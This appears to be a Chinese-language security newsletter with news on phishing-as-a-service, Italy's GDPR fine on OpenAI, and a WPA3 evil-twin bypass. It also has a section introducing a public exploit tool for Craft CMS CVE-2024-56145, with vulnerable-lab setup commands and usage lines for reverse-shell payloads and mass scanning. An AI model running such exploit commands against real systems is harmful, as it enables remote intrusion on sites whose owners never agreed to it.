國內(nèi)外要聞

Rockstar 2FA 故障催生 FlowerStorm 釣魚即服務(wù)擴(kuò)張現(xiàn)象剖析

? ??在網(wǎng)絡(luò)安全的復(fù)雜戰(zhàn)場(chǎng)中，近期出現(xiàn)了一個(gè)值得關(guān)注的動(dòng)態(tài)：名為 Rockstar 2FA 的釣魚即服務(wù)（PhaaS）工具包遭遇變故，意外推動(dòng)了另一個(gè)新生服務(wù) FlowerStorm 的猖獗擴(kuò)張。

????據(jù) Sophos 上周發(fā)布的新報(bào)告指出，運(yùn)營 Rockstar 2FA 服務(wù)的團(tuán)體似乎經(jīng)歷了至少部分基礎(chǔ)設(shè)施的崩潰，與該服務(wù)相關(guān)的頁面已無法訪問?！斑@并非由于執(zhí)法取締行動(dòng)，而是服務(wù)后端出現(xiàn)了一些技術(shù)故障?！?上月末，Trustwave 首次記錄了 Rockstar 2FA，它作為一種 PhaaS 服務(wù)，能讓不法分子發(fā)起釣魚攻擊，竊取微軟 365 賬戶憑據(jù)和會(huì)話 cookie，繞過多重身份驗(yàn)證（MFA）保護(hù)。該服務(wù)被評(píng)估為 DadSec 釣魚工具包的更新版本，微軟以 Storm - 1575 之名對(duì)其追蹤，多數(shù)釣魚頁面托管于.com、.de、.ru 和.moscow 頂級(jí)域名，不過.ru 域名的使用據(jù)信已隨時(shí)間減少。

??? 2024 年 11 月 11 日，Rockstar 2FA 似乎遭遇技術(shù)中斷，轉(zhuǎn)向中間誘餌頁面時(shí)引發(fā) Cloudflare 超時(shí)錯(cuò)誤，偽造登錄頁面無法加載。雖然尚不清楚中斷緣由，但此 PhaaS 工具包留下的空白，致使與 FlowerStorm 相關(guān)的釣魚活動(dòng)激增。FlowerStorm 至少自 2024 年 6 月起就已活躍，Sophos 稱，二者在釣魚門戶頁面格式及連接后端服務(wù)器竊取憑據(jù)的方法上存在相似之處，暗示可能有共同起源，且都濫用 Cloudflare Turnstile 防止頁面請(qǐng)求來自機(jī)器人。有人懷疑 11 月 11 日的中斷，要么代表其中一個(gè)團(tuán)體的戰(zhàn)略轉(zhuǎn)向，要么是運(yùn)營人員變動(dòng)，抑或是有意拆分兩項(xiàng)業(yè)務(wù)，現(xiàn)階段尚無確鑿證據(jù)將二者關(guān)聯(lián)。

????使用 FlowerStorm 最頻繁的目標(biāo)國家包括美國、加拿大、英國、澳大利亞、意大利、瑞士、波多黎各、德國、新加坡和印度。Sophos 表示：“受攻擊最嚴(yán)重的行業(yè)是服務(wù)業(yè)，尤其聚焦于提供工程、建筑、房地產(chǎn)、法律服務(wù)與咨詢的公司?！?這些發(fā)現(xiàn)再次凸顯出一種持續(xù)趨勢(shì)：攻擊者即便無需深厚技術(shù)專長，也能利用網(wǎng)絡(luò)犯罪服務(wù)和通用工具大規(guī)模發(fā)動(dòng)網(wǎng)絡(luò)攻擊，這為網(wǎng)絡(luò)安全防護(hù)敲響了警鐘，各方需進(jìn)一步加強(qiáng)防范與監(jiān)測(cè)，以應(yīng)對(duì)此類不斷演變的威脅。

意大利因 ChatGPT 違反 GDPR 數(shù)據(jù)隱私規(guī)定對(duì) OpenAI 罰款 1500 萬歐元

????在數(shù)據(jù)隱私備受矚目的當(dāng)下，意大利的數(shù)據(jù)保護(hù)機(jī)構(gòu)對(duì) ChatGPT 的開發(fā)者 OpenAI 開出了高達(dá) 1500 萬歐元（約合 1566 萬美元）的罰單，原因是這款生成式人工智能應(yīng)用在處理個(gè)人數(shù)據(jù)方面存在諸多問題。

????早在近一年前，意大利數(shù)據(jù)保護(hù)機(jī)構(gòu)（Garante）就發(fā)現(xiàn) ChatGPT 在違反歐盟《通用數(shù)據(jù)保護(hù)條例》（GDPR）的情況下，使用用戶信息來訓(xùn)練其服務(wù)。該機(jī)構(gòu)指出，OpenAI 未就 2023 年 3 月發(fā)生的安全漏洞向其通報(bào)，并且在沒有充分法律依據(jù)的情況下，使用用戶的個(gè)人信息來訓(xùn)練 ChatGPT。同時(shí)，還指責(zé)該公司違背了透明度原則以及對(duì)用戶的相關(guān)信息告知義務(wù)。

????此外，Garante 表示：“OpenAI 也未設(shè)立年齡驗(yàn)證機(jī)制，這可能會(huì)使 13 歲以下兒童面臨接觸與其發(fā)展程度和自我認(rèn)知不符的不當(dāng)回應(yīng)的風(fēng)險(xiǎn)。” 除了罰款，OpenAI 還被要求開展為期六個(gè)月的宣傳活動(dòng)，通過廣播、電視、報(bào)紙以及互聯(lián)網(wǎng)等渠道，增進(jìn)公眾對(duì) ChatGPT 運(yùn)作方式的了解。

????具體而言，要讓公眾知曉其為訓(xùn)練模型所收集的數(shù)據(jù)（包括用戶和非用戶信息）的性質(zhì)，以及用戶可用來反對(duì)、更正或刪除這些數(shù)據(jù)的權(quán)利。Garante 補(bǔ)充道：“通過這次宣傳活動(dòng)，ChatGPT 的用戶和非用戶都必須清楚如何阻止生成式人工智能使用他們的個(gè)人數(shù)據(jù)進(jìn)行訓(xùn)練，從而切實(shí)保障他們?cè)?GDPR 下的權(quán)利。”

????意大利曾在 2023 年 3 月下旬率先以數(shù)據(jù)保護(hù)擔(dān)憂為由，對(duì) ChatGPT 實(shí)施了臨時(shí)禁令。近一個(gè)月后，在 OpenAI 解決了 Garante 提出的相關(guān)問題后，ChatGPT 才恢復(fù)訪問。OpenAI 在發(fā)給美聯(lián)社的一份聲明中稱，這一處罰決定并不合理，其打算提起上訴，稱該罰款金額幾乎是其在意大利那段時(shí)期營收的 20 倍。同時(shí)，它還表示致力于提供有益且尊重用戶隱私權(quán)的人工智能。

????此次裁決出臺(tái)之前，歐洲數(shù)據(jù)保護(hù)委員會(huì)（EDPB）曾提出一種觀點(diǎn)，即非法處理個(gè)人數(shù)據(jù)但在部署前已進(jìn)行匿名化處理的人工智能模型，并不構(gòu)成違反 GDPR 的行為。該委員會(huì)表示：“如果能夠證明人工智能模型后續(xù)的運(yùn)行不涉及個(gè)人數(shù)據(jù)處理，那么 EDPB 認(rèn)為 GDPR 并不適用。因此，初始處理的非法性不應(yīng)影響模型后續(xù)的運(yùn)行。”

????而且，EDPB 還認(rèn)為，當(dāng)控制者在模型匿名化后，對(duì)部署階段收集的個(gè)人數(shù)據(jù)進(jìn)行后續(xù)處理時(shí)，GDPR 將適用于這些處理操作。本月早些時(shí)候，該委員會(huì)還發(fā)布了關(guān)于以符合 GDPR 的方式處理向非歐洲國家進(jìn)行數(shù)據(jù)轉(zhuǎn)移的指南，這些指南將接受公眾咨詢，截止日期為 2025 年 1 月 27 日，并指出 “第三國當(dāng)局的判決或決定不能在歐洲自動(dòng)得到認(rèn)可或執(zhí)行。如果一個(gè)組織響應(yīng)第三國當(dāng)局對(duì)個(gè)人數(shù)據(jù)的請(qǐng)求，這種數(shù)據(jù)流動(dòng)就構(gòu)成了轉(zhuǎn)移，GDPR 就會(huì)適用。”

WPA3 網(wǎng)絡(luò)密碼遭中間人攻擊與社會(huì)工程學(xué)手段繞過

????在網(wǎng)絡(luò)安全領(lǐng)域，近期研究有了令人擔(dān)憂的發(fā)現(xiàn)：研究人員成功地通過結(jié)合中間人（MITM）攻擊和社會(huì)工程學(xué)技術(shù)，繞過了 Wi-Fi 保護(hù)訪問 3（WPA3）協(xié)議以獲取網(wǎng)絡(luò)密碼。

????來自西印度群島大學(xué)的凱爾?查迪、韋恩?古德里奇和科夫卡?汗開展的此項(xiàng)研究，凸顯了最新無線安全標(biāo)準(zhǔn)中潛在的漏洞。WPA3 于 2018 年推出，旨在彌補(bǔ)其前身 WPA2 的缺陷，并為 Wi-Fi 網(wǎng)絡(luò)提供更強(qiáng)的安全性。其關(guān)鍵特性之一是對(duì)等同時(shí)認(rèn)證（SAE）協(xié)議，旨在使密碼能抵御離線字典攻擊。

????然而，研究人員證明可以利用 WPA3 過渡模式中的弱點(diǎn)，該模式用于與 WPA2 設(shè)備向后兼容。通過利用降級(jí)攻擊，他們能夠捕獲部分 WPA3 握手信息，然后結(jié)合社會(huì)工程學(xué)技術(shù)來恢復(fù)網(wǎng)絡(luò)密碼。

????攻擊方法主要包含三個(gè)主要步驟：首先，使用降級(jí)攻擊捕獲握手信息；其次，將用戶從原始 WPA3 網(wǎng)絡(luò)中解除認(rèn)證；最后，創(chuàng)建一個(gè)帶有強(qiáng)制門戶的 “惡意雙胞胎” 接入點(diǎn)以獲取密碼。研究人員使用樹莓派來模擬 WPA3 接入點(diǎn)，并利用 Airgeddon 等開源工具來創(chuàng)建惡意接入點(diǎn)和強(qiáng)制門戶。當(dāng)毫無防備的用戶嘗試連接到虛假網(wǎng)絡(luò)時(shí)，會(huì)被提示輸入 Wi-Fi 密碼，然后該密碼會(huì)與捕獲的握手信息進(jìn)行驗(yàn)證。

????這項(xiàng)研究引發(fā)了對(duì) WPA3 安全性的擔(dān)憂，尤其是其過渡模式。研究發(fā)現(xiàn)，當(dāng)未實(shí)施受保護(hù)管理幀（這是許多用戶可能未意識(shí)到或未啟用的設(shè)置）時(shí)，攻擊能夠成功。有趣的是，研究人員還發(fā)現(xiàn)一些設(shè)備無法連接到 WPA3 過渡網(wǎng)絡(luò)，這與 Wi-Fi 聯(lián)盟聲稱的與 WPA2 的向后兼容性相矛盾。

????雖然該攻擊需要特定條件和用戶交互，但它表明了保護(hù)無線網(wǎng)絡(luò)面臨的持續(xù)挑戰(zhàn)。研究人員強(qiáng)調(diào)了用戶教育以及正確配置 WPA3 網(wǎng)絡(luò)以減輕此類風(fēng)險(xiǎn)的重要性。網(wǎng)絡(luò)安全專家呼吁對(duì) WPA3 的漏洞進(jìn)行進(jìn)一步調(diào)查，并開發(fā)更多的防護(hù)措施。由于 Wi-Fi 網(wǎng)絡(luò)對(duì)于企業(yè)和個(gè)人而言都是關(guān)鍵基礎(chǔ)設(shè)施，確保其安全性至關(guān)重要。

????這項(xiàng)研究的結(jié)果提醒人們，即使是最先進(jìn)的安全協(xié)議也可能容易受到技術(shù)漏洞利用和社會(huì)工程學(xué)巧妙組合的攻擊。隨著 WPA3 采用率的增加，用戶和制造商都必須保持警惕，并實(shí)施最佳實(shí)踐以保護(hù)無線網(wǎng)絡(luò)免受潛在攻擊。研究團(tuán)隊(duì)計(jì)劃繼續(xù)開展工作，探索更多漏洞并開發(fā)對(duì)策，以增強(qiáng) WPA3 和未來無線協(xié)議的安全性。他們的努力有助于在不斷演變的數(shù)字安全環(huán)境中，網(wǎng)絡(luò)安全專業(yè)人員與潛在攻擊者之間持續(xù)的對(duì)抗。

知識(shí)分享

CVE-2024-56145: Craft CMS 漏洞利用工具介紹

一、工具背景與用途

????這款工具旨在利用 Craft CMS 中存在的一個(gè)漏洞，該漏洞是由 Assetnote 出色的研究團(tuán)隊(duì)所發(fā)現(xiàn)的。這個(gè)漏洞源于對(duì)用戶提供的模板路徑處理不當(dāng)，使得攻擊者能夠通過特制的有效載荷實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行（RCE）。

二、工具特點(diǎn)

1. 自動(dòng)化 FTP 服務(wù)器：具備自動(dòng)化的 FTP 服務(wù)器功能，可用于提供惡意的有效載荷，方便攻擊者實(shí)施相關(guān)攻擊行為。

2. 多種反向 shell 有效載荷生成：支持生成多種類型（如 bash、nc、mkfifo 等）的反向 shell 有效載荷，使用者可根據(jù)具體需求進(jìn)行選擇，增加了攻擊手段的靈活性。

3. 漏洞檢查功能：提供漏洞檢查器，能夠識(shí)別存在此漏洞的易受攻擊目標(biāo)，有助于攻擊者篩選合適的攻擊對(duì)象，也方便安全人員提前排查隱患。

4. 多線程支持：支持多線程運(yùn)行，能夠?qū)崿F(xiàn)更快的掃描速度，在面對(duì)大量目標(biāo)時(shí)可以有效提高檢測(cè)或攻擊的效率。

5. 易用的 CLI 界面：擁有清晰易用的命令行界面（CLI），操作過程中會(huì)給出明確的反饋信息，無論是專業(yè)安全人員還是有一定基礎(chǔ)的使用者都能較方便地操作該工具。

三、搭建易受攻擊的測(cè)試環(huán)境（設(shè)置漏洞測(cè)試實(shí)驗(yàn)室）

????若要設(shè)置用于測(cè)試目的的 Craft CMS 實(shí)例，可按照以下步驟進(jìn)行操作：

1. 首先創(chuàng)建相關(guān)目錄并進(jìn)入：

mkdir exploit-craft && \cd exploit-craft && \

2. 配置 DDEV 項(xiàng)目用于 Craft CMS：

ddev config \  --project-type=craftcms \  --docroot=web \  --create-docroot \  --php-version="8.2" \  --database="mysql:8.0" \  --nodejs-version="20" && \

3.?創(chuàng)建 DDEV 項(xiàng)目：

ddev?start?-y?&&?\

4. 創(chuàng)建指定版本的 Craft CMS：

ddev?composer?create?-y?--no-scripts?--no-interaction?"craftcms/craft:5.0.0"?&&?\

5. 安裝特定的 CMS 版本：

ddev?composer?require?"craftcms/cms:5.5.0"?\  --no-scripts \  --no-interaction --with-all-dependencies && \

6. 設(shè)置 Craft CMS 的安全密鑰：

ddev?craft?setup/security-key?&&?\

7.?安裝 Craft CMS：

ddev?craft?install/craft?\    --username=admin \    --password=password123 \    --email=admin@example.com \    --site-name=Testsite \    --language=en \    --site-url='$DDEV_PRIMARY_URL' && \

8. 為 PHP 啟用 register_argc_argv：

mkdir?-p.ddev/php/?&&?\echo "register_argc_argv = On" >.ddev/php/php.ini && \ddev restart && \

9. 最后輸出提示信息并啟動(dòng)項(xiàng)目：???????

echo?'Nice,?ready?to?launch!'?&&?\ddev launch

四、工具使用方法

查看幫助信息：
運(yùn)行工具時(shí)添加?--help?標(biāo)志，就能查看可用的命令，命令格式如下：

python exploit.py --help

利用命令（Exploit Command）：

若要利用某個(gè)目標(biāo)的漏洞，使用以下命令格式：

python exploit.py exploit -u <TARGET_URL> -lh <LOCAL_HOST> -lp <LOCAL_PORT> -px <PAYLOAD_TYPE>

各參數(shù)含義如下：

-u 或?--url：指定目標(biāo) URL，此參數(shù)是必需的。-lh 或?--lhost：用于接收反向 shell 的本地 IP，也是必需參數(shù)。-lp 或?--lport：本地用于監(jiān)聽的端口，同樣為必需項(xiàng)。-fh 或?--ftp-host：FTP 服務(wù)器主機(jī)地址。-fp 或?--ftp-port：FTP 服務(wù)器端口號(hào)。-px 或?--payload：有效載荷類型（可選 bash、nc、mkfifo 等），默認(rèn)值為 bash。??????

例如：python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash

檢查命令（Check Command）

python exploit.py check -u <TARGET_URL> -f <FILE_WITH_URLS> -t <THREADS> -o <OUTPUT_FILE>

各參數(shù)含義如下：???????

-u 或?--url：單個(gè)目標(biāo) URL。-f 或?--file：包含多個(gè)要掃描的 URL 的文件。-t 或?--threads：用于掃描的并發(fā)線程數(shù)量。-o 或 --output：用于保存結(jié)果的輸出文件。

例如：

python exploit.py check -f urls.txt -t 10 -o results.txt

????最后需要強(qiáng)調(diào)的是，應(yīng)秉持負(fù)責(zé)任、符合道德的態(tài)度來使用這款工具，該工具的代碼倉庫地址為

?https://github.com/Chocapikk/CVE-2024-56145，使用者可前往獲取更多詳細(xì)內(nèi)容。